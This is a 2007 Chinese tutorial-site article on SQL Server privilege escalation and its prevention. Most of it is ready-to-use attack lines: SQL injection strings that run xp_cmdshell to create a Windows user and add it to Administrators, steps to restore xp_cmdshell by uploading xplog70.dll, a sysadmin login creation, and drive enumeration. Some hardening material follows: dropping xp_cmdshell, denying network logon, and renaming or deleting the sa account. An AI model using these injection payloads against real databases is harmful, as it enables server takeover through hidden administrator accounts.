|
|
 |
专题栏目 |
 |
|
相关文章 |
|
|
|
|
|
 |
SQL Server 提升权限相关命令及防范 |
热 |
|
| SQL Server 提升权限相关命令及防范 |
|
作者:AppleBBS 文章来源:不详 点击数: 更新时间:2007-11-14 13:06:26  |
|
SQL Server 提升权限相关命令及防范
;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--
程序代码开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname =''''xplog70.dll''''
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype=''''X'''' and name=''''xp_cmdshell''''
返回结果为1就OK
恢复xp_cmdshell
Exec master.dbo.addextendedproc ''''xp_cmdshell'''',''''xplog70.dll'''';select count(*) from master.dbo.sysobjects where xtype=''''X'''' and name=''''xp_cmdshell''''
返回结果为1就OK
否则上传xplog7.0.dll
Exec master.dbo.addextendedproc ''''xp_cmdshell'''',''''C:/WinNt/System32/xplog70.dll''''
堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"
DOS:
dir c:/
dir d:/
dir e:/
net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add
备份恢复IPSEC
secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf
SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
sa帐号的改名和删除
首先打开SQL中的企业管理器,接着在工具选项卡中选择SQL server配置属性依次,点服务器设置,看到允许对系统目录直接进行修改前面的方框吗,点一下,好。
再打开查询分析器,登陆进去(呵呵,随便你用什么帐号进去,不过可一定要在master数据库中有db_owner的权限)输入
update sysxlogins set name=''''你要改成的名字'''' where sid=0x01
update sysxlogins set sid=0xE765555BD44F054F89CD0076A06EA823 where name=''''你要改成的名字''''
OK,执行成功,好拉,转道企业管理器中刷新安全性中的登陆,看看,sa是不是变成xwq拉,呵呵,选中xwq点击右键,怎么样是不是出现拉删除的选项,呵呵,删除。看看sa是不是已经没有拉。
后记
直接在查询分析器里怎么删除sa
直接在查询分析器里怎么删除sa,做法和前面所说的差不多,只不过这次不是在企业管理器中做手脚拉,而是利用sql提供给我们功能强大的存储过程来完成这项任务。下面就是我所说的需要利用的存储过程sp_configure,sp_configure显示或更改当前服务器的全局配置设置。
它的语法:
sp_configure [ [ @configname = ] ''''name'''' ]
[ , [ @configvalue = ] ''''value'''' ]
实例:
sp_configure ''''allow updates'''', 1
go
RECONFIGURE WITH OVERRIDE
go
好拉,这样我们就可以更新系统表拉,接下来和前面的做法一样拉 update sysxlogins set name=''''你要改成的名字'''' where sid=0x01,然后再删除"你改名后的那个名字"
不过要注意在 sp_configure 上没有参数(或只有第一个参数)的执行许可权限默认授予所有用户。有两个参数的 sp_configure(用于更改配置选项)的执行许可权限默认授予 sysadmin 和 serveradmin 固定服务器角色。RECONFIGURE 权限默认授予 sysadmin 固定服务器角色和 serveradmin 固定服务器角色,并且不能传输。还得在master中是db_owner。
|
|
| 文章录入:mintao 责任编辑:mintao |
|
|
上一篇文章: 分页 SQLServer存储过程
下一篇文章: 删除MSSQL危险存储过程的代码 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
 注:本站部分文章源于互联网,版权归原作者所有!如有侵权,请原作者与本站联系,本站将立即删除! 本站文章除特别注明外均可转载,但需注明出处! [MinTao学以致用网] |
| 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
| |
|
|
|
|
